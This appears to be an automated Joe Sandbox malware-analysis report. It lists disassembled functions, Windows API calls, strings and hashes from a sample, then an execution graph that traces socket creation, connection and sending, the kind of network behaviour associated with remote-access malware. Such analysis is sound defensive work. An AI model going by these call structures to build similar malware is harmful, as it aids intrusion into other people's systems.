                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Locale$InfoThread
                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                • API String ID: 4232894706-2493093252
                                                                • Opcode ID: 14a652e7a4f1e4567987caad0792318ae202c2a5f38426d2ecef11d6f21b462d
                                                                • Instruction ID: 9d1fcec36e2e9c225fd1cf16021627f8fe5422ca1fd2c9808e1cb9f35a270d75
                                                                • Opcode Fuzzy Hash: 14a652e7a4f1e4567987caad0792318ae202c2a5f38426d2ecef11d6f21b462d
                                                                • Instruction Fuzzy Hash: EC611F35F0024C9FDB01EBA4D8D0A9E77FB9FC9300F519535A601AB3C5DA35EA0A9B91
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?,?,?,?,?,?,0290449E,02902CF3), ref: 02904365
                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?,?,?,?,?,?,0290449E), ref: 0290436B
                                                                • GetStdHandle.KERNEL32(000000F5,029043B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3), ref: 02904380
                                                                • WriteFile.KERNEL32(00000000,000000F5,029043B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3), ref: 02904386
                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029043A4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: FileHandleWrite$Message
                                                                • String ID: Error$Runtime error at 00000000
                                                                • API String ID: 1570097196-2970929446
                                                                • Opcode ID: 58679b1aa2a07a99c998d04d8a3b2d6da033fbd0c0277e8cc2adb58a0d92e89a
                                                                • Instruction ID: 87ce2c2a622378c135edbb525558225c8470b59e11a3d1f9a729df2595a788dd
                                                                • Opcode Fuzzy Hash: 58679b1aa2a07a99c998d04d8a3b2d6da033fbd0c0277e8cc2adb58a0d92e89a
                                                                • Instruction Fuzzy Hash: 9EF0B462EC834C7DFA50A6A0ADC6F6A376D57C9F20F101A06B724B40C5C7A494C88B26
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(KernelBase,00000000,02917C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02917BBE
                                                                • GetProcAddress.KERNEL32(00000000,KernelBase), ref: 02917BC4
                                                                • GetCurrentProcess.KERNELBASE ref: 02917BCE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressCurrentHandleModuleProcProcess
                                                                • String ID: GetCurre$KernelBase$oces
                                                                • API String ID: 4190356694-953896676
                                                                • Opcode ID: 9d743ca76663fe242d536ab31b0ced10473d0d60a5ad1fc27a0a318a71f87f39
                                                                • Instruction ID: 307fbd37ab189163f10c19d3e10651bbdea19acd8da644169bf84170f795c91c
                                                                • Opcode Fuzzy Hash: 9d743ca76663fe242d536ab31b0ced10473d0d60a5ad1fc27a0a318a71f87f39
                                                                • Instruction Fuzzy Hash: 73F0A430BC430D7FF611ABE2DD82FAAF7AED7C4F00F610860B501A26C0D77469104925
                                                                APIs
                                                                  • Part of subcall function 0290ACB4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD1
                                                                  • Part of subcall function 0290ACB4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACF5
                                                                  • Part of subcall function 0290ACB4: GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD10
                                                                  • Part of subcall function 0290ACB4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADA6
                                                                • CharToOemA.USER32(?,?), ref: 0290AE73
                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0290AE90
                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AE96
                                                                • GetStdHandle.KERNEL32(000000F4,0290AF00,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AEAB
                                                                • WriteFile.KERNEL32(00000000,000000F4,0290AF00,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AEB1
                                                                • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0290AED3
                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0290AEE9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                • String ID:
                                                                • API String ID: 185507032-0
                                                                • Opcode ID: 3c70135fd18192795852a92cfc1f4ab0bf0af6aa24ff6a45b430aa3bac3382c3
                                                                • Instruction ID: b768cd3e4e8f7ed83493fa964570ed799ca103c3dd97dad9155488ef0b37dc75
                                                                • Opcode Fuzzy Hash: 3c70135fd18192795852a92cfc1f4ab0bf0af6aa24ff6a45b430aa3bac3382c3
                                                                • Instruction Fuzzy Hash: E0111CB2548308AED200E794CCC5F9B77AEAF84700F40092AB754D71D1DB70E9548B66
                                                                APIs
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0290E59D
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0290E5B9
                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0290E5F2
                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0290E66F
                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0290E688
                                                                • VariantCopy.OLEAUT32(?,00000000), ref: 0290E6BD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                • String ID:
                                                                • API String ID: 351091851-0
                                                                • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                • Instruction ID: d122af429cfe151169050e9ae185d03825c6aa5e81980c6c6bd94b0867dbd7de
                                                                • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                • Instruction Fuzzy Hash: C651FBB590062D9FDB26EB98C8C0BD9B3BDAF8D300F0445D5E549A7281D670AF848F60
                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0290358A
                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029035D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029035BD
                                                                • RegCloseKey.ADVAPI32(?,029035E0,00000000,?,00000004,00000000,029035D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029035D3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                • API String ID: 3677997916-4173385793
                                                                • Opcode ID: f4e2dafb3d610cbbb51cfe7f19e9c26d912ffe911294ad2613f08c3628e34de0
                                                                • Instruction ID: d312ab301f2254c2170ecc0881154880ba5b0798281ead06face420b167148f9
                                                                • Opcode Fuzzy Hash: f4e2dafb3d610cbbb51cfe7f19e9c26d912ffe911294ad2613f08c3628e34de0
                                                                • Instruction Fuzzy Hash: 2101B176A8430CBEEB21DB908D82BBE77ECDB4DB10F1005A2BA04D65C0E6759A10DB58
                                                                APIs
                                                                • GetThreadLocale.KERNEL32(?,00000000,0290AA5F,?,?,00000000), ref: 0290A9E0
                                                                  • Part of subcall function 0290A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A75A
                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0290AA5F,?,?,00000000), ref: 0290AA10
                                                                • EnumCalendarInfoA.KERNEL32(Function_0000A914,00000000,00000000,00000004), ref: 0290AA1B
                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0290AA5F,?,?,00000000), ref: 0290AA39
                                                                • EnumCalendarInfoA.KERNEL32(Function_0000A950,00000000,00000000,00000003), ref: 0290AA44
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                • String ID:
                                                                • API String ID: 4102113445-0
                                                                • Opcode ID: 473ed1f446f31644aeb4fc8fde24600b1abd13166b5ae331ee11f423c5f11b69
                                                                • Instruction ID: 6287336fed5ab5723a29b3940b63456a9add5d0738b129fe41eb137af46c598e
                                                                • Opcode Fuzzy Hash: 473ed1f446f31644aeb4fc8fde24600b1abd13166b5ae331ee11f423c5f11b69
                                                                • Instruction Fuzzy Hash: 2001A23160035C6FF702A6B5CD92BAE739FDBC6720F910560F711E66D0E6649F108AE4
                                                                APIs
                                                                • GetThreadLocale.KERNEL32(?,00000000,0290AC48,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0290AAA7
                                                                  • Part of subcall function 0290A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A75A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Locale$InfoThread
                                                                • String ID: eeee$ggg$yyyy
                                                                • API String ID: 4232894706-1253427255
                                                                • Opcode ID: d51ab6fcc059bfbbe5d43e33f2fa36749245b33db88395fa7890ac3dac8983ca
                                                                • Instruction ID: 10071c20d8adc47cdb1f35175394282a5bf0c574b43a2c682772c277929a849b
                                                                • Opcode Fuzzy Hash: d51ab6fcc059bfbbe5d43e33f2fa36749245b33db88395fa7890ac3dac8983ca
                                                                • Instruction Fuzzy Hash: 0741E33170431D4FD711EBA988C06BEB3EBDBD6300B554929D762C73C4EA64AD468AA1
                                                                APIs
                                                                  • Part of subcall function 029058B4: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 029058D1
                                                                  • Part of subcall function 029058B4: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 029058E8
                                                                  • Part of subcall function 029058B4: lstrcpyn.KERNEL32(?,?,?), ref: 02905918
                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
                                                                • RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001), ref: 02905B55
                                                                • RegCloseKey.ADVAPI32(?,02905B84,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: QueryValue$AddressCloseHandleModuleProclstrcpyn
                                                                • String ID: }
                                                                • API String ID: 22635895-4239843852
                                                                • Opcode ID: b24030859cdb6e7e831b5dd58ed769a068d5a0198f0d1f7cbdb6ee32071737f2
                                                                • Instruction ID: 5185f71fabdc45cdedf7323e611dc547fd82d6ae0b4f8773bb748ca9e44c535e
                                                                • Opcode Fuzzy Hash: b24030859cdb6e7e831b5dd58ed769a068d5a0198f0d1f7cbdb6ee32071737f2
                                                                • Instruction Fuzzy Hash: 7011A07150438DAEFB11DAA4C885BEFBBBCBF49710F514196EA00D61C1C778A504CF60
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0290C3F2
                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0290C403
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                • API String ID: 1646373207-3712701948
                                                                • Opcode ID: c121713c2a42c25160c391e61da0bab020a2643f75a2b2c94affe7326bbe286d
                                                                • Instruction ID: a1b98e2fa954ab1d3e9e7f09e17e5df47859a1bdf211fdeac0224e0bc5b740f4
                                                                • Opcode Fuzzy Hash: c121713c2a42c25160c391e61da0bab020a2643f75a2b2c94affe7326bbe286d
                                                                • Instruction Fuzzy Hash: 44D0C9F2E8535D5FF7206FF26CC1A3236DCAB88318B41A92AE205461C1D7B1842A9FD4
                                                                APIs
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0290E20F
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0290E22B
                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0290E2A2
                                                                • VariantClear.OLEAUT32(?), ref: 0290E2CB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                • String ID:
                                                                • API String ID: 920484758-0
                                                                • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                • Instruction ID: e454758d02ecb7eb5fef641bc4cf03a6dc8f2b56ec6aa20db7c5932fd86c9bf1
                                                                • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                • Instruction Fuzzy Hash: AE41FB75A0021D9FCB65EB58CCD0BC9B3BDEB8C710F0045E5E649A7291DA30AF808F60
                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD1
                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACF5
                                                                • GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD10
                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADA6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                • String ID:
                                                                • API String ID: 3990497365-0
                                                                • Opcode ID: 23dbdd14fe9d38846fd388a9ab0128d767f9bb8c82b4fa1d43643044ab41dafc
                                                                • Instruction ID: 8ee35ae86987421e93f0d47642cf30c2e539734ea4107beffe104f20c40086e3
                                                                • Opcode Fuzzy Hash: 23dbdd14fe9d38846fd388a9ab0128d767f9bb8c82b4fa1d43643044ab41dafc
                                                                • Instruction Fuzzy Hash: B941E771A0025C9FDB21DBA8CCC4BDAB7FDAB58311F0040E9A648A7291DB749E948F50
                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD1
                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACF5
                                                                • GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD10
                                                                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADA6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                • String ID:
                                                                • API String ID: 3990497365-0
                                                                • Opcode ID: a75af8e0bc50474044bdee44c7a3d91fa062693309e32848feb5aaa058703f13
                                                                • Instruction ID: 87ebf428cd4257ed341b0b9a3b79f27307146dcc83c4fcda49600371b7ef355f
                                                                • Opcode Fuzzy Hash: a75af8e0bc50474044bdee44c7a3d91fa062693309e32848feb5aaa058703f13
                                                                • Instruction Fuzzy Hash: A841E871A0025C9FDB21EB68CCC4BDAB7EDAB58311F4440E5A648E7291DB749E94CF50
                                                                APIs
                                                                • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 0291A2EC
                                                                • IsBadHugeWritePtr.KERNEL32(?,00000004), ref: 0291A31C
                                                                • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 0291A33B
                                                                • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 0291A347
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Huge$Read$Write
                                                                • String ID:
                                                                • API String ID: 1732373845-0
                                                                • Opcode ID: 6749dca09a2808ede702bf45426d7d81c710bbadfd288e5e0b265e135c720541
                                                                • Instruction ID: ba595aeae661183e5e07f1b094958f6ce9b98eb914ca4a627223286cca9982ee
                                                                • Opcode Fuzzy Hash: 6749dca09a2808ede702bf45426d7d81c710bbadfd288e5e0b265e135c720541
                                                                • Instruction Fuzzy Hash: 3F21B4B1A4121D9FDB20CF6ACC84BAE73A9EF80361F148516EE5097380D734DC12CAA0
                                                                APIs
                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02909552), ref: 029094EA
                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02909552), ref: 029094F0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: DateFormatLocaleThread
                                                                • String ID: yyyy
                                                                • API String ID: 3303714858-3145165042
                                                                • Opcode ID: a0a03db0ca663ae6e8f820c48d06d64697ee953ce7cf3197b6cd0921637d3df4
                                                                • Instruction ID: 1a9ecd505b048fbc5c12a137f11615e6fc34324d3ff8b77042fbd7f19539d8cd
                                                                • Opcode Fuzzy Hash: a0a03db0ca663ae6e8f820c48d06d64697ee953ce7cf3197b6cd0921637d3df4
                                                                • Instruction Fuzzy Hash: C9216271A0021C9FEB11DF99C8C1AAEB3B9EF88B10F4140A5EE45E7291D7349E40DBA5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0e3b47abda850ddaccb5c2c98e0e371ba4830067759e1d3c4c66b943532310b9
                                                                • Instruction ID: 95f8a97841f589d96e57d507367f42058782693940825b4ec9639f8aa2c3c11b
                                                                • Opcode Fuzzy Hash: 0e3b47abda850ddaccb5c2c98e0e371ba4830067759e1d3c4c66b943532310b9
                                                                • Instruction Fuzzy Hash: A9A1C1A67106080FD719AA7C9CC43BEB2CADBC4365F28427EE61DCB3D1EB68C9518650
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AllocValue
                                                                • String ID: (x
                                                                • API String ID: 1189806713-2016957024
                                                                • Opcode ID: e38119dd502e31bd2a3689d3fcaed04db38c78a6a0e2e59d4c7d4a0e434d6114
                                                                • Instruction ID: f014eea5eb0ac21912d5352b136741f5ef883cc77938649df2eca3fff61449b2
                                                                • Opcode Fuzzy Hash: e38119dd502e31bd2a3689d3fcaed04db38c78a6a0e2e59d4c7d4a0e434d6114
                                                                • Instruction Fuzzy Hash: 94C012B1D453088EEB10BBB0A08472937ADAB80310B006C20B408C7188DB39C834AF98

                                                                Execution Graph

                                                                Execution Coverage:2.6%
                                                                Dynamic/Decrypted Code Coverage:99.4%
                                                                Signature Coverage:4.3%
                                                                Total number of Nodes:1726
                                                                Total number of Limit Nodes:49
                                                                execution_graph 101478 4165a0 101489 401e65 101478->101489 101480 4165b0 101494 4020f6 101480->101494 101483 401e65 22 API calls 101484 4165c6 101483->101484 101485 4020f6 28 API calls 101484->101485 101486 4165d1 101485->101486 101500 41292a 101486->101500 101490 401e6d 101489->101490 101491 401e75 101490->101491 101519 402158 22 API calls 101490->101519 101491->101480 101495 40210c 101494->101495 101520 4023ce 101495->101520 101497 402126 101524 402569 101497->101524 101499 402134 101499->101483 101572 40482d 101500->101572 101502 41293e 101579 4048c8 connect 101502->101579 101506 41295f 101644 402f10 101506->101644 101515 401fd8 11 API calls 101516 412991 101515->101516 101517 401fd8 11 API calls 101516->101517 101518 412999 101517->101518 101521 402428 101520->101521 101522 4023d8 101520->101522 101521->101497 101522->101521 101534 4027a7 101522->101534 101545 402888 101524->101545 101526 40257d 101527 402592 101526->101527 101528 4025a7 101526->101528 101550 402a34 22 API calls 101527->101550 101552 4028e8 101528->101552 101531 40259b 101551 4029da 22 API calls 101531->101551 101533 4025a5 101533->101499 101535 402e21 101534->101535 101538 4016b4 101535->101538 101537 402e30 101537->101521 101539 4016cb 101538->101539 101543 4016c6 101538->101543 101540 4016f3 101539->101540 101539->101543 101540->101537 101542 43bd18 101544 43bd19 11 API calls _abort 101543->101544 101544->101542 101546 402890 101545->101546 101547 402898 101546->101547 101563 402ca3 22 API calls 101546->101563 101547->101526 101550->101531 101551->101533 101553 4028f1 101552->101553 101554 402953 101553->101554 101556 4028fb 101553->101556 101570 4028a4 22 API calls 101554->101570 101558 402904 101556->101558 101560 402917 101556->101560 101564 402cae 101558->101564 101561 402915 101560->101561 101562 4023ce 11 API calls 101560->101562 101561->101533 101562->101561 101565 402cb8 __EH_prolog 101564->101565 101571 402e54 22 API calls 101565->101571 101567 4023ce 11 API calls 101569 402d92 101567->101569 101568 402d24 101568->101567 101569->101561 101571->101568 101573 404846 socket 101572->101573 101574 404839 101572->101574 101576 404860 CreateEventW 101573->101576 101577 404842 101573->101577 101685 40489e WSAStartup 101574->101685 101576->101502 101577->101502 101578 40483e 101578->101573 101578->101577 101580 404a1b 101579->101580 101581 4048ee 101579->101581 101582 404a21 WSAGetLastError 101580->101582 101632 40497e 101580->101632 101583 404923 101581->101583 101581->101632 101686 40531e 101581->101686 101584 404a31 101582->101584 101582->101632 101721 420c60 27 API calls 101583->101721 101587 404932 101584->101587 101588 404a36 101584->101588 101593 402093 28 API calls 101587->101593 101726 41cae1 30 API calls 101588->101726 101589 40492b 101589->101587 101592 404941 101589->101592 101590 40490f 101691 402093 101590->101691 101603 404950 101592->101603 101604 404987 101592->101604 101596 404a80 101593->101596 101595 404a40 101727 4052fd 28 API calls 101595->101727 101600 402093 28 API calls 101596->101600 101605 404a8f 101600->101605 101608 402093 28 API calls 101603->101608 101723 421a40 53 API calls 101604->101723 101609 41b4ef 79 API calls 101605->101609 101612 40495f 101608->101612 101609->101632 101611 40498f 101614 4049c4 101611->101614 101615 404994 101611->101615 101616 402093 28 API calls 101612->101616 101725 420e06 28 API calls 101614->101725 101618 402093 28 API calls 101615->101618 101619 40496e 101616->101619 101621 4049a3 101618->101621 101622 41b4ef 79 API calls 101619->101622 101625 402093 28 API calls 101621->101625 101628 404973 101622->101628 101623 4049cc 101624 4049f9 CreateEventW CreateEventW 101623->101624 101626 402093 28 API calls 101623->101626 101624->101632 101627 4049b2 101625->101627 101629 4049e2 101626->101629 101630 41b4ef 79 API calls 101627->101630 101722 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 101628->101722 101633 402093 28 API calls 101629->101633 101634 4049b7 101630->101634 101639 402f31 101632->101639 101635 4049f1 101633->101635 101724 4210b2 51 API calls 101634->101724 101637 41b4ef 79 API calls 101635->101637 101638 4049f6 101637->101638 101638->101624 101640 4020df 11 API calls 101639->101640 101641 402f3d 101640->101641 101642 4032a0 28 API calls 101641->101642 101643 402f59 101642->101643 101643->101506 101789 401fb0 101644->101789 101646 402f1e 101647 402055 11 API calls 101646->101647 101648 402f2d 101647->101648 101649 404aa1 101648->101649 101650 404ab4 101649->101650 101792 40520c 101650->101792 101652 404ac9 _Yarn 101653 404b40 WaitForSingleObject 101652->101653 101654 404b20 101652->101654 101656 404b56 101653->101656 101655 404b32 send 101654->101655 101657 404b7b 101655->101657 101798 42103a 53 API calls 101656->101798 101660 401fd8 11 API calls 101657->101660 101659 404b69 SetEvent 101659->101657 101661 404b83 101660->101661 101662 401fd8 11 API calls 101661->101662 101663 404b8b 101662->101663 101664 401fd8 101663->101664 101665 4023ce 11 API calls 101664->101665 101666 401fe1 101665->101666 101667 404c10 101666->101667 101668 4020df 11 API calls 101667->101668 101669 404c27 101668->101669 101670 4020df 11 API calls 101669->101670 101677 404c30 101670->101677 101674 404ca1 101857 404e26 WaitForSingleObject 101674->101857 101677->101674 101679 401fd8 11 API calls 101677->101679 101816 43bd51 101677->101816 101823 404b96 101677->101823 101829 4020b7 101677->101829 101835 401fe2 101677->101835 101844 404cc3 101677->101844 101679->101677 101680 401fd8 11 API calls 101681 404cb1 101680->101681 101682 401fd8 11 API calls 101681->101682 101683 404cba 101682->101683 101683->101515 101685->101578 101728 4020df 101686->101728 101688 40532a 101732 4032a0 101688->101732 101690 405346 101690->101590 101692 40209b 101691->101692 101693 4023ce 11 API 